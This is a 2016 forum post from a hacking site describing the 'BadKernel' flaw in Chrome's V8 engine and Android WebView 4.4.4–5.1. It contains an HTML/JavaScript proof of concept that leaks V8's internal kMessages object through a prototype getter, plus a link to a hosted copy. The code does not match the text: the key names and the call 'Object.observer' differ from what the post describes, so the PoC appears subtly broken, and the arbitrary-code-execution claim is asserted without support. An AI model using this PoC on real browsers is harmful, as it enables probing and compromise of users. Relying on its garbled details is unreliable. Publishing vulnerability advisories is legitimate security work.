HackerTop - View topic - Google Chrome V8 BadKernel Vulnerability
View unanswered posts | View active topics It is currently Mon Dec 11, 2017 5:08 pm



Reply to topic  [ 1 post ] 
 Google Chrome V8 BadKernel Vulnerability 
Author Message
User avatar

Joined: Sun Jul 24, 2016 12:11 pm
Posts: 11
Reply with quote
Google V8 JavaScript Engine is Chrome browser for the development of a set of open source JavaScript engine.

The vulnerability is due to the source code in the "observe_accept_invalid" exception type was mistakenly written as "observe_invalid_accept"".

An attacker can use the vulnerability to cause kMessages key object information leakage, the implementation of arbitrary code.

Based on the 4.4.4 Android to 5.1 version of the system WebView controls the development of mobile phone APP are likely to be affected by the vulnerability.


Google Chrome V8 : 3.20 ~ 4.2 Version

Android: 4.4.4 ~ 5.1 Version

Code:
Proof of Concept
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>badkernel</title>
</head>
<script type="text/javascript">
    var kMessages;
    Object.prototype.__defineGetter__("observer_accept_invalid", function(){kMessages=this});
    try{
        Object.observer({},function(){}, 1);
    } catch(e) {
    }
    delete Object.prototype["observer_accept_invalid"];
    alert(kMessages);
</script>

</html>


Or

http://poc.hackertop.org/Android/v8rce_poc.html



If the browser can access the following page, if you can get the kMessages object,

Output object name is vulnerability

If output undefined does't vulnerability.


chrome://version


Refer:

http://www.cnnvd.org.cn/vulnerability/s ... 2016080414


Tue Aug 23, 2016 11:14 am
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 1 post ] 

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2003-2016 HackerTop. All rights reserved.
Privacy & Cookies Policy
Community Forum Software by phpBB